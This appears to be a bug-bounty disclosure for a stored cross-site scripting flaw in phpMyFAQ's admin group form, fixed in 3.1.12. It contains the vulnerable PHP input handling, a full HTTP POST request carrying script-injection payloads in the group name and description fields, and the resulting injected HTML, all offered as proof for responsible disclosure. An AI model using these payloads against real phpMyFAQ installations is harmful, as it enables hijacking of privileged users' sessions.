XSS @ group in thorsten/phpmyfaq

Valid

Reported on

Mar 8th 2023


Description

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Proof of Concept

Code:

if ($groupAction == 'addsave' && $user->perm->hasPermission($user->getUserId(), 'addgroup')) {
    $user = new User($faqConfig);
    $message = '';
    $messages = [];
    $groupName = Filter::filterInput(INPUT_POST, 'group_name', FILTER_UNSAFE_RAW, '');
    $groupDescription = Filter::filterInput(INPUT_POST, 'group_description', FILTER_UNSAFE_RAW, '');
    $groupAutoJoin = Filter::filterInput(INPUT_POST, 'group_auto_join', FILTER_UNSAFE_RAW, '');
    $csrfOkay = true;
    $csrfToken = Filter::filterInput(INPUT_POST, 'csrf', FILTER_UNSAFE_RAW);

Request:

POST /admin/?action=group&group_action=addsave HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=EDITthis; cookieconsent_status=dismiss; pmf_sid=34
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://roy.demo.phpmyfaq.de/
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers

csrf=EDITthis&group_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&group_description=%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Payload 1:

</textarea><script>alert(1)</script>

Payload 2:

<script>alert(1)</script>

Result:

     <div id="group_data" class="card mb-4">
        <h5 class="card-header py-3">
          <i class="fa fa-info-circle" aria-hidden="true"></i> Group details        </h5>
        <form action="?action=group&group_action=update_data" method="post">
          <input id="update_group_id" type="hidden" name="group_id" value="0">
          <div class="card-body">
            <div class="form-group row">
              <label class="col-lg-3 col-form-label" for="update_group_name">
                  Name              </label>
              <div class="col-lg-9">
                <input id="update_group_name" type="text" name="name" class="form-control"
                       tabindex="1" value="<script>alert(1)</script>">
              </div>
            </div>
            <div class="form-group row">
              <label class="col-lg-3 col-form-label" for="update_group_description">
                  Description              </label>
              <div class="col-lg-9">
                <textarea id="update_group_description" name="description" class="form-control"
                          rows="3"
                          tabindex="2"></textarea><script>alert(1)</script></textarea>
              </div>
            </div>

Impact

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs

Occurrences

$groupName = Filter::filterInput(INPUT_POST, 'group_name', FILTER_UNSAFE_RAW, '');
$groupDescription = Filter::filterInput(INPUT_POST, 'group_description', FILTER_UNSAFE_RAW, '');
We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. 6 months ago
thorsten/phpmyfaq maintainer has acknowledged this report 6 months ago
Thorsten Rinne gave praise 6 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Thorsten Rinne validated this vulnerability 6 months ago
hatlesswizard has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
hatlesswizard
6 months ago

Researcher


Could you assign a CVE please @thorsten

Thorsten Rinne marked this as fixed in 3.1.12 with commit d773df 6 months ago
Thorsten Rinne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Mar 31st 2023
group.php#L224 has been validated
Thorsten Rinne published this vulnerability 6 months ago
to join this conversation